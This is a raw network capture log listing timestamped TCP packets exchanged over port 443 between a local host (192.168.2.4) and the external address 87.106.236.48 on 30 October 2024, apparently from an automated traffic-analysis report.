Oct 30, 2024 19:47:16.699887037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.699908018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.699982882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.699996948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.700027943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.700048923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.701060057 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701080084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701150894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.701159000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701205015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.701860905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701875925 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701939106 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.701946974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.701986074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.702521086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.702534914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.702593088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.702600956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.702640057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.735933065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.735949993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.736125946 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.736151934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.736300945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.736644983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.736659050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.736721992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.736740112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.736780882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.774840117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.774862051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.775027990 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.775064945 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.775252104 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.823688984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.823708057 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.823903084 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.823921919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.823970079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.824867964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.824884892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.824942112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.824950933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.824989080 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.825333118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.825351954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.825402975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.825411081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.825452089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.826294899 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.826309919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.826364040 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.826371908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.826409101 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.826927900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.826941013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.826997995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.827006102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.827049971 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.859946966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.859961987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.860129118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.860152960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.860202074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.860444069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.860457897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.860511065 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.860517025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.860557079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.898562908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.898576975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.898895979 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.898911953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.898966074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.956152916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956171036 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956218958 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.956231117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956259012 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.956279039 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.956748009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956763983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956819057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.956830025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.956866980 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.957349062 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.957362890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.957420111 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.957427979 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.957479000 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958146095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958162069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958197117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958204031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958226919 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958255053 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958785057 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958800077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958834887 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958841085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.958868027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.958884001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.983501911 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.983516932 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.983576059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.983582973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.983624935 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.984227896 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984241009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984292984 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.984299898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984325886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.984343052 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.984654903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984668016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984710932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.984718084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.984757900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.079368114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.079382896 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.079466105 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.079479933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.079523087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.079957962 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.079977036 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.080017090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.080024004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.080049038 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.080065012 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.080765963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.080780029 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.080832958 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.080841064 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.080876112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.081234932 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.081248999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.081307888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.081315041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.081362963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.082118988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082135916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082185030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.082192898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082231045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.082578897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082593918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082647085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.082654953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.082689047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.107064009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.107079983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.107152939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.107167959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.107208967 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.107903957 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.107920885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.107975006 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.107983112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.108022928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.145694017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.145719051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.145817995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.145833015 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.145879030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.206487894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.206513882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.206582069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.206599951 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.206741095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.206741095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.207021952 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207043886 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207083941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.207092047 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207118034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.207128048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.207818031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207834959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207890034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.207897902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.207935095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.208532095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.208549976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.208597898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.208606958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.208645105 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.209137917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209151983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209202051 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.209209919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209249020 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.209765911 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209779024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209821939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.209829092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.209849119 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.209871054 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.230628014 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.230644941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.230833054 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.230840921 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.231251001 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.231270075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.231334925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.231344938 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.231353045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.231389046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.269107103 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.269124031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.269232035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.269247055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.269398928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.329797983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.329813004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.330050945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.330061913 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.330112934 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.330533981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.330549002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.330605984 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.330614090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.330651045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.331278086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331295013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331343889 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.331353903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331389904 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.331788063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331804037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331856966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.331864119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.331907988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.333724976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.333743095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.333790064 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.333796978 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.333825111 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.333842993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.334404945 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.334420919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.334469080 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.334475994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.334522963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.353562117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.353578091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.353723049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.353729963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.353770971 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.354278088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354291916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354351044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.354357958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354396105 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.354733944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354751110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354788065 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.354794979 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.354821920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.354837894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.392577887 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.392591953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.392676115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.392683029 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.392869949 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.453649044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.453668118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.453929901 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.453942060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.454108000 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.454252005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.454266071 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.454314947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.454320908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.454348087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.454360962 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.454921007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.454937935 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.455005884 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.455013990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.455054045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.455799103 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.455815077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.455869913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.455883026 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.455915928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.456747055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.456759930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.456819057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.456830025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.456866980 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.457557917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.457571983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.457622051 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.457628965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.457659006 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.477231979 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477247000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477318048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.477330923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477370024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.477848053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477860928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477900982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.477907896 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.477941036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.477960110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.478631020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.478646994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.478697062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.478703976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.478732109 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.478754044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.516313076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.516330004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.516371012 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.516380072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.516407967 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.516417980 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.576898098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.576911926 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.576961040 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.576968908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.577008009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.577694893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.577709913 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.577763081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.577769995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.577807903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578289986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.578305960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.578350067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578356981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.578378916 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578392029 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578804970 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.578819990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.578860044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578866005 CET	443	49731	87.106.236.48	192.168.2.4
